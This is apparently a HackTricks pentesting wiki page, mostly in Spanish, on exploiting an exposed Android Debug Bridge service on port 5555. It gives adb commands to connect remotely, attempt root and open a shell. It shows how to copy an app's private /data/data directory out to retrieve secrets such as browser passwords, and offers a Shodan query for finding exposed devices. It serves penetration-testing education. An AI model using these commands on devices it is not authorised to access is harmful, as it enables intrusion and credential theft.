4 KiB
5555 - Android Debug Bridge
{% hint style="success" %}
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Información Básica
De la documentación:
Android Debug Bridge (adb) es una herramienta de línea de comandos versátil que te permite comunicarte con un dispositivo. El comando adb facilita una variedad de acciones en el dispositivo, como instalar y depurar aplicaciones, y proporciona acceso a un shell de Unix que puedes usar para ejecutar una variedad de comandos en un dispositivo.
Puerto por defecto: 5555.
PORT STATE SERVICE VERSION
5555/tcp open adb Android Debug Bridge device (name: msm8909; model: N3; device: msm8909)
Connect
Si encuentras el servicio ADB ejecutándose en un puerto de un dispositivo y puedes conectarte a él, puedes obtener un shell dentro del sistema:
adb connect 10.10.10.10
adb root # Try to escalate to root
adb shell
Para más comandos ADB, consulta la siguiente página:
{% content-ref url="../mobile-pentesting/android-app-pentesting/adb-commands.md" %} adb-commands.md {% endcontent-ref %}
Volcar datos de la aplicación
Para descargar completamente los datos de una aplicación, puedes:
# From a root console
chmod 777 /data/data/com.package
cp -r /data/data/com.package /sdcard Note: Using ADB attacker cannot obtain data directly by using command " adb pull /data/data/com.package". He is compulsorily required to move data to Internal storage and then he can pull that data.
adb pull "/sdcard/com.package"
Puedes usar este truco para recuperar información sensible como contraseñas de chrome. Para más información sobre esto, consulta la información y referencias proporcionadas aquí.
Shodan
android debug bridge
{% hint style="success" %}
Aprende y practica Hacking en AWS:HackTricks Training AWS Red Team Expert (ARTE)
Aprende y practica Hacking en GCP: HackTricks Training GCP Red Team Expert (GRTE)
Apoya a HackTricks
- Revisa los planes de suscripción!
- Únete al 💬 grupo de Discord o al grupo de telegram o síguenos en Twitter 🐦 @hacktricks_live.
- Comparte trucos de hacking enviando PRs a los HackTricks y HackTricks Cloud repositorios de github.